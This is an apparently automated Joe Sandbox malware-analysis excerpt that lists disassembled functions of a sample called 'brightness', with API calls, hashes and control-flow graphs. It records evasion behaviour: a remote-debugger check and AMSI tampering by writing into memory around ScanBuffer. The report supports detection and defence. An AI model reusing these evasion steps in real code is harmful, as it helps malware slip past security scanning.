                • Instruction Fuzzy Hash: 0851997DA4024CBEFB61D6E8CC46FEF77BD9B04744F8001A1A709E6181D7789A448F61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5647 290f024-290f03e GetModuleHandleW 5648 290f040-290f052 GetProcAddress 5647->5648 5649 290f06a-290f072 5647->5649 5648->5649 5650 290f054-290f064 CheckRemoteDebuggerPresent 5648->5650 5650->5649 5651 290f066 5650->5651 5651->5649
                APIs
                • GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F034
                • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F046
                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F05D
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                • String ID: CheckRemoteDebuggerPresent$KernelBase
                • API String ID: 35162468-539270669
                • Opcode ID: 0b73b29d8488b64e292a5bdafeb5c9a6df4681195fa40da28f551ec20670ddd5
                • Instruction ID: c1e2ec2c27a0e5adb6bd29f4f70187e23f4538f60bf4113f2788771c1602b405
                • Opcode Fuzzy Hash: 0b73b29d8488b64e292a5bdafeb5c9a6df4681195fa40da28f551ec20670ddd5
                • Instruction Fuzzy Hash: 89F0A734A0425CAED720B6A888C8BDDFBBD5B15728F6443D4A475B25C1EB790790C661

                Control-flow Graph

                APIs
                  • Part of subcall function 028F4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4EDA
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E01F
                • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E04F
                • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290E064
                • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290E090
                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290E099
                  • Part of subcall function 028F4C0C: SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                • String ID:
                • API String ID: 1897104825-0
                • Opcode ID: 47ff211c5c136d3e75b74a67e891c6cf599391e8bad952fdd7c5c1327bc448f9
                • Instruction ID: d1e7dfd52233cea2009437623a10e9f06969051f7d827d3d555fcc5895b09107
                • Opcode Fuzzy Hash: 47ff211c5c136d3e75b74a67e891c6cf599391e8bad952fdd7c5c1327bc448f9
                • Instruction Fuzzy Hash: 69219175B5030CBEEB51EAD8CC86FDF77BDAB48704F500462B700E71C0D6B4AA458A65

                Control-flow Graph

                APIs
                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E86A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: CheckConnectionInternet
                • String ID: Initialize$OpenSession$ScanBuffer
                • API String ID: 3847983778-3852638603
                • Opcode ID: 6a6d3300160fdd106638b64aa834133ac8266706f5a83da6cf5cd6083d4cd8bd
                • Instruction ID: 590e2b86d3cddacc158ea5cebd5662ba0b5197d0576ad32673a7d57aaea2c3ca
                • Opcode Fuzzy Hash: 6a6d3300160fdd106638b64aa834133ac8266706f5a83da6cf5cd6083d4cd8bd
                • Instruction Fuzzy Hash: 3541E43DB1010C9FEB51EBA8D881A9FB7FAEF84710F114836E641E7295DA74AD018F15

                Control-flow Graph

                APIs
                  • Part of subcall function 02908018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908088,?,?,00000000,?,029079FE,ntdll,00000000,00000000,02907A43,?,?,00000000), ref: 02908056
                  • Part of subcall function 02908018: GetModuleHandleA.KERNELBASE(?), ref: 0290806A
                  • Part of subcall function 029080C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
                  • Part of subcall function 029080C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
                  • Part of subcall function 029080C0: GetProcAddress.KERNEL32(?,?), ref: 02908125
                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                • String ID: Ntdll$yromeMlautriVetirW
                • API String ID: 2719805696-3542721025
                • Opcode ID: 83ef961ce2bc0d2fdb83f79bd58a953e95d2e9edf2867784702d77bf91027edf
                • Instruction ID: d6b9593cbfc8e81e7c033d7e5d8ffaab3a29d345b23a6277707630ab00496af4
                • Opcode Fuzzy Hash: 83ef961ce2bc0d2fdb83f79bd58a953e95d2e9edf2867784702d77bf91027edf
                • Instruction Fuzzy Hash: 8A012D79B44309AFDB40EF98D881EABB7EDEF8D710F514851BA00D76D0C630A9108B61

                Control-flow Graph

                APIs
                  • Part of subcall function 02906CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02906D39,?,?,?,00000000), ref: 02906D19
                • CoCreateInstance.OLE32(?,00000000,00000005,02906E2C,00000000,00000000,02906DAB,?,00000000,02906E1B), ref: 02906D97
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: CreateFromInstanceProg
                • String ID:
                • API String ID: 2151042543-0
                • Opcode ID: 74d11edd100c011c062d413e446c65a3136f13dec349e0bd54415e3790c072af
                • Instruction ID: c6fe8abdea86918149d2d3714739d80b8ae00c77a3b34cacae582e2b60416c12
                • Opcode Fuzzy Hash: 74d11edd100c011c062d413e446c65a3136f13dec349e0bd54415e3790c072af
                • Instruction Fuzzy Hash: BF01F275208708AEF715DF64DCA286FBBADE789B10B520835F601E26C0E7309930C865

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5572 28f1724-28f1736 5573 28f173c-28f174c 5572->5573 5574 28f1968-28f196d 5572->5574 5575 28f174e-28f175b 5573->5575 5576 28f17a4-28f17ad 5573->5576 5577 28f1973-28f1984 5574->5577 5578 28f1a80-28f1a83 5574->5578 5579 28f175d-28f176a 5575->5579 5580 28f1774-28f1780 5575->5580 5576->5575 5583 28f17af-28f17bb 5576->5583 5581 28f1938-28f1945 5577->5581 5582 28f1986-28f19a2 5577->5582 5584 28f1a89-28f1a8b 5578->5584 5585 28f1684-28f16ad VirtualAlloc 5578->5585 5586 28f176c-28f1770 5579->5586 5587 28f1794-28f17a1 5579->5587 5589 28f1782-28f1790 5580->5589 5590 28f17f0-28f17f9 5580->5590 5581->5582 5588 28f1947-28f195b Sleep 5581->5588 5591 28f19a4-28f19ac 5582->5591 5592 28f19b0-28f19bf 5582->5592 5583->5575 5593 28f17bd-28f17c9 5583->5593 5594 28f16df-28f16e5 5585->5594 5595 28f16af-28f16dc call 28f1644 5585->5595 5588->5582 5596 28f195d-28f1964 Sleep 5588->5596 5601 28f182c-28f1836 5590->5601 5602 28f17fb-28f1808 5590->5602 5597 28f1a0c-28f1a22 5591->5597 5598 28f19d8-28f19e0 5592->5598 5599 28f19c1-28f19d5 5592->5599 5593->5575 5600 28f17cb-28f17de Sleep 5593->5600 5595->5594 5596->5581 5604 28f1a3b-28f1a47 5597->5604 5605 28f1a24-28f1a32 5597->5605 5609 28f19fc-28f19fe call 28f15cc 5598->5609 5610 28f19e2-28f19fa 5598->5610 5599->5597 5600->5575 5608 28f17e4-28f17eb Sleep 5600->5608 5606 28f18a8-28f18b4 5601->5606 5607 28f1838-28f1863 5601->5607 5602->5601 5611 28f180a-28f181e Sleep 5602->5611 5616 28f1a49-28f1a5c 5604->5616 5617 28f1a68 5604->5617 5605->5604 5613 28f1a34 5605->5613 5618 28f18dc-28f18eb call 28f15cc 5606->5618 5619 28f18b6-28f18c8 5606->5619 5614 28f187c-28f188a 5607->5614 5615 28f1865-28f1873 5607->5615 5608->5576 5620 28f1a03-28f1a0b 5609->5620 5610->5620 5611->5601 5622 28f1820-28f1827 Sleep 5611->5622 5613->5604 5624 28f188c-28f18a6 call 28f1500 5614->5624 5625 28f18f8 5614->5625 5615->5614 5623 28f1875 5615->5623 5626 28f1a5e-28f1a63 call 28f1500 5616->5626 5627 28f1a6d-28f1a7f 5616->5627 5617->5627 5631 28f18fd-28f1936 5618->5631 5637 28f18ed-28f18f7 5618->5637 5628 28f18cc-28f18da 5619->5628 5629 28f18ca 5619->5629 5622->5602 5623->5614 5624->5631 5625->5631 5626->5627 5628->5631 5629->5628
                APIs
                • Sleep.KERNEL32(00000000,?,028F1FC1), ref: 028F17D0
                • Sleep.KERNEL32(0000000A,00000000,?,028F1FC1), ref: 028F17E6
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: d935895ddfb84c681322f98be10373775f48733f972f65dd68fed9750ea56c06
                • Instruction ID: 357ef213296c91f3efba982b376c84aee94289d4607a0eb4ea48774235f5b769
                • Opcode Fuzzy Hash: d935895ddfb84c681322f98be10373775f48733f972f65dd68fed9750ea56c06
                • Instruction Fuzzy Hash: B4B1667EA05352CBCB55CF6CE588B61BBE1EB84324F1886AED64DCB385C7349461CB90

                Control-flow Graph

                APIs
                • LoadLibraryW.KERNEL32(amsi), ref: 0290870D
                  • Part of subcall function 029080C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
                  • Part of subcall function 029080C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
                  • Part of subcall function 029080C0: GetProcAddress.KERNEL32(?,?), ref: 02908125
                  • Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C
                • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0290876C
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                • String ID: DllGetClassObject$W$amsi
                • API String ID: 941070894-2671292670
                • Opcode ID: 4e195c716d69c770dd99196cf2d0fc140b89f8f212598b5083edd7f7236881d0
                • Instruction ID: 0bfeb8569c47ff9c0d9cea331d8d49edbf46b119708a9b0a2331adbbd881191b
                • Opcode Fuzzy Hash: 4e195c716d69c770dd99196cf2d0fc140b89f8f212598b5083edd7f7236881d0
                • Instruction Fuzzy Hash: 0CF0A45054C385BDE200E6788C85F4BBFCD4B91234F048B1CB2E8962D2D679E10487B7

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5652 28f1a8c-28f1a9b 5653 28f1b6c-28f1b6f 5652->5653 5654 28f1aa1-28f1aa5 5652->5654 5655 28f1c5c-28f1c60 5653->5655 5656 28f1b75-28f1b7f 5653->5656 5657 28f1b08-28f1b11 5654->5657 5658 28f1aa7-28f1aae 5654->5658 5664 28f16e8-28f170b call 28f1644 VirtualFree 5655->5664 5665 28f1c66-28f1c6b 5655->5665 5660 28f1b3c-28f1b49 5656->5660 5661 28f1b81-28f1b8d 5656->5661 5657->5658 5659 28f1b13-28f1b27 Sleep 5657->5659 5662 28f1adc-28f1ade 5658->5662 5663 28f1ab0-28f1abb 5658->5663 5659->5658 5666 28f1b2d-28f1b38 Sleep 5659->5666 5660->5661 5667 28f1b4b-28f1b5f Sleep 5660->5667 5669 28f1b8f-28f1b92 5661->5669 5670 28f1bc4-28f1bd2 5661->5670 5673 28f1af3 5662->5673 5674 28f1ae0-28f1af1 5662->5674 5671 28f1abd-28f1ac2 5663->5671 5672 28f1ac4-28f1ad9 5663->5672 5681 28f170d-28f1714 5664->5681 5682 28f1716 5664->5682 5666->5657 5667->5661 5678 28f1b61-28f1b68 Sleep 5667->5678 5676 28f1b96-28f1b9a 5669->5676 5670->5676 5677 28f1bd4-28f1bd9 call 28f14c0 5670->5677 5675 28f1af6-28f1b03 5673->5675 5674->5673 5674->5675 5675->5656 5683 28f1bdc-28f1be9 5676->5683 5684 28f1b9c-28f1ba2 5676->5684 5677->5676 5678->5660 5687 28f1719-28f1723 5681->5687 5682->5687 5683->5684 5686 28f1beb-28f1bf2 call 28f14c0 5683->5686 5688 28f1bf4-28f1bfe 5684->5688 5689 28f1ba4-28f1bc2 call 28f1500 5684->5689 5686->5684 5691 28f1c2c-28f1c59 call 28f1560 5688->5691 5692 28f1c00-28f1c28 VirtualFree 5688->5692
                APIs
                • Sleep.KERNEL32(00000000,?,?,00000000,028F1FE4), ref: 028F1B17
                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028F1FE4), ref: 028F1B31
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 82658ae23ffde26d9cdc924f2039de17d696fd244bc1065056b7e6d3ee581a9d
                • Instruction ID: 31ca9600ff7a84221d897276dec16db32e88a865ad25c8dcb7a6ab51cb2c8f40
                • Opcode Fuzzy Hash: 82658ae23ffde26d9cdc924f2039de17d696fd244bc1065056b7e6d3ee581a9d
                • Instruction Fuzzy Hash: 9451FD3DA05240CFDB95CF6CD988B66BBD0AB45328F1881AED64CCB286E774C445CBA1

                Control-flow Graph

                APIs
                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E86A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: CheckConnectionInternet
                • String ID: Initialize$OpenSession$ScanBuffer
                • API String ID: 3847983778-3852638603
                • Opcode ID: a0c3e518f2fa57e5bde496a58546556de9e176fe5b86f10c6c5f24b1d403eac1
                • Instruction ID: 315a7eae050a5348be1d455d8f98788d68ef3b0c8da84002546e9db21c13dd6c
                • Opcode Fuzzy Hash: a0c3e518f2fa57e5bde496a58546556de9e176fe5b86f10c6c5f24b1d403eac1
                • Instruction Fuzzy Hash: 8E41E43DB1010C9FEB51EBA8D881A9FB7FAEF84710F114836E641E7295DA74AD018F15

                Control-flow Graph

                APIs
                • LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
                • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
                  • Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C
                • FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                • String ID:
                • API String ID: 1543721669-0
                • Opcode ID: b37ef34b2d57f180c03700dd1298569ac2a006aa66359bc7f8fb3ccdaa4c7dee
                • Instruction ID: 750d0980ee5a9ff5294e034b83dd1c21d800d9c0fda0bb0b363ef5e24c6cc1d1
                • Opcode Fuzzy Hash: b37ef34b2d57f180c03700dd1298569ac2a006aa66359bc7f8fb3ccdaa4c7dee
                • Instruction Fuzzy Hash: A2117F78F44328AFE740FBB8CC41A5E77ADAB85B10F5044257F14FB2D0DA3499108B16

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5855 28fe2e4-28fe2f0 5856 28fe2ff-28fe304 5855->5856 5857 28fe2f2-28fe2f8 VariantClear call 28fdfb0 5855->5857 5859 28fe306-28fe313 call 28f44ac 5856->5859 5860 28fe315-28fe31a 5856->5860 5863 28fe2fd 5857->5863 5867 28fe35b-28fe35e 5859->5867 5861 28fe31c-28fe324 5860->5861 5862 28fe326-28fe32b 5860->5862 5861->5867 5865 28fe32d-28fe334 call 28fe168 5862->5865 5866 28fe336-28fe341 call 2902e24 5862->5866 5863->5867 5865->5867 5874 28fe34f-28fe356 VariantClear VariantInit 5866->5874 5875 28fe343-28fe34d 5866->5875 5874->5867 5875->5867
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: 65be66cbad43da2eb013dfec9d9230114caaf7100f8132dbc82b8fcc39a29a00
                • Instruction ID: 30fd49d6804a575195573f53b8ebf48bea8454f9a447c15113978e233171114a
                • Opcode Fuzzy Hash: 65be66cbad43da2eb013dfec9d9230114caaf7100f8132dbc82b8fcc39a29a00
                • Instruction Fuzzy Hash: D6F0AF2DB08218CADBE4BF28898856D239A5F407047481426A70ADB225DB249C49CB63

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5877 290705c-29070a6 call 28f4eec 5880 29070a8-29070ba call 28fafc8 call 28f3e68 5877->5880 5881 29070bf-29070c1 5877->5881 5880->5881 5883 29070c7-29070db 5881->5883 5884 2907288-29072af 5881->5884 5885 29070dd-29070f7 5883->5885 5887 29072b1-29072c0 5884->5887 5888 29072d9-29072dc 5884->5888 5889 2907111-2907115 5885->5889 5890 29070f9-290710c 5885->5890 5894 29072c2 5887->5894 5895 29072c7-29072d7 5887->5895 5891 29072ed-2907309 5888->5891 5892 29072de-29072e0 5888->5892 5898 2907117-2907126 5889->5898 5899 290718b-290718d 5889->5899 5896 290727f-2907282 5890->5896 5903 290730e-2907310 5891->5903 5892->5891 5897 29072e2-29072e6 5892->5897 5894->5895 5895->5891 5896->5884 5896->5885 5897->5891 5900 29072e8 5897->5900 5901 2907158-2907180 call 28f535c 5898->5901 5902 2907128-2907156 call 28f535c 5898->5902 5904 29071d4-29071d8 5899->5904 5905 290718f-2907193 5899->5905 5900->5891 5925 2907183-2907186 5901->5925 5902->5925 5909 2907312-2907315 call 2907634 5903->5909 5910 290731a-290731f 5903->5910 5906 29071da-29071e2 5904->5906 5907 290724d-2907264 5904->5907 5912 2907195-290719f 5905->5912 5913 29071b7-29071cf 5905->5913 5915 2907222-290724b 5906->5915 5916 29071e4-2907220 call 28f535c 5906->5916 5914 290727b 5907->5914 5918 2907266-290726a 5907->5918 5909->5910 5921 2907321-290732e 5910->5921 5922 290733d-290734f 5910->5922 5912->5913 5923 29071a1-29071b2 call 28fea58 5912->5923 5913->5914 5914->5896 5915->5914 5916->5914 5918->5914 5926 290726c-2907278 5918->5926 5927 2907330-2907334 call 28f5338 5921->5927 5928 2907339-290733b 5921->5928 5932 2907351-2907361 SysFreeString 5922->5932 5933 2907363 5922->5933 5923->5913 5925->5914 5926->5914 5927->5928 5928->5921 5928->5922 5932->5932 5932->5933
                APIs
                • SysFreeString.OLEAUT32(?), ref: 0290735A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FreeString
                • String ID: H
                • API String ID: 3341692771-2852464175
                • Opcode ID: 831129bab04593e78ba59193b3807a948f47684979037babc9262c3beaa1b8b9
                • Instruction ID: 40b6e29b87429bfee5afe989f9e482f6ca7fb62ec2e437dd623ff415bba6a1ca
                • Opcode Fuzzy Hash: 831129bab04593e78ba59193b3807a948f47684979037babc9262c3beaa1b8b9
                • Instruction Fuzzy Hash: 48B1C079A01608AFDB54CF99D480A9DFBF6FF89324F248569E905AB3A4D730A841CF50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5935 28fe37c-28fe38c 5936 28fe38e-28fe47c call 28fe37c 5935->5936 5937 28fe3ab-28fe3af 5935->5937 5939 28fe3b8-28fe3c4 VariantInit 5937->5939 5940 28fe3b1-28fe3b6 5937->5940 5942 28fe3c7-28fe3e0 5939->5942 5940->5942 5944 28fe3e2 5942->5944 5945 28fe3f0-28fe3f5 5942->5945 5946 28fe3fc-28fe403 5944->5946 5947 28fe3e4-28fe3e7 5944->5947 5945->5946 5948 28fe3f7-28fe3fa 5945->5948 5951 28fe447-28fe458 5946->5951 5952 28fe405-28fe412 call 29074c5 5946->5952 5947->5946 5949 28fe3e9-28fe3ec 5947->5949 5948->5946 5950 28fe41d-28fe429 call 2902e24 5948->5950 5949->5946 5954 28fe3ee 5949->5954 5960 28fe42b-28fe440 5950->5960 5961 28fe442 call 28fdc18 5950->5961 5958 28fe46f 5951->5958 5959 28fe45a-28fe46a call 28fe78c call 28fe360 5951->5959 5956 28fe418-28fe41b 5952->5956 5954->5950 5956->5951 5959->5958 5960->5951 5961->5951
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
